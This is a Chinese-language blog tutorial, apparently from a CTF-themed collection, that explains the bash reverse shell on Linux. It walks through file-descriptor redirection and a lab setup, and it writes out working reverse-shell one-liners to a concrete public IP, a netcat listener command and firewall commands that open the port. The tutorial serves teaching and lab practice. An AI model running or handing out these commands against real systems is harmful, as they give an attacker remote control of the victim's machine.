Linux下反弹shell的原理

Linux下反弹shell的原理-bash

shell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有:

bash-Linux标准默认的shell

sh-Unix标准默认的shell

shell是Linux的外壳,为用户和内核之间的交互提供了一个接口

反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端

bash建立反弹shell

bash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1

bash -i >& /dev/tcp/101.43.119.212/12306 0>&1

  • 参数i用于打开交互式的shell > 输出重定向 &用于区分文件和文件描述符

>&+数字表示后面的数字是文件描述符,不加&会把后面的数字当成文件

>&+文件表示将标准输出重定向至文件

  • 文件描述符:0–标准输入重定向 1–标准输出重定向 2–标准错误输出重定向
  • /dev目录下的tcp、udp是Linux中的特殊设备可用于建立网络链接,读写这两个文件,就相当于在网络链接中传输数据
  • >& /dev/tcp/攻击端IP/攻击端监听端口 表示将标准输出和标准错误输出重定向到攻击机(这时目标机的执行结果可以从攻击机看到)
  • 0>&1 将标准输入重定向到标准输出-攻击机,从而可以通过攻击机输入命令

/dev/tcp/ip/port是一个特殊的文件,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的。但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信

公网攻击机反弹本地shell

本地反弹shell尝试:

  1. 攻击机:云端Centos服务器(公网IP:101.43.119.212:2002) 靶机:本地Centos服务器(192.168.182.134)

反弹shell过程:攻击机开启nc监听端口,靶机执行bash命令

攻击机主机端口开启2002监听从靶机bash进行shell反弹的内容

首先服务器放行2002端口用于监听
Linux下反弹shell的原理_第1张图片

firewall-cmd --zone=public --add-port=2002/tcp --permanent
firewall-cmd --reload
nc -n -lvvp 2002

放行成功后开启监听

Linux下反弹shell的原理_第2张图片

同时本地Centos靶机输入:

bash -i >& /dev/tcp/101.43.119.212/2002 0>&1

或者

bash -i > /dev/tcp/81.X.X.X/5432 0>&1 2>&1

若报错显示不存在该目录或者文件夹可以通过touch /dev/tcp创建

靶机运行
Linux下反弹shell的原理_第3张图片

链接成功

Linux下反弹shell的原理_第4张图片

输入命令进行执行:

Linux下反弹shell的原理_第5张图片

反弹shell成功

本地攻击机反弹本地shell

攻击机:Windows netcat(192.168.43.200) 靶机:Centos(192.168.182.134)

操作同上
Linux下反弹shell的原理_第6张图片

你可能感兴趣的:(CTF专题,linux,bash,服务器)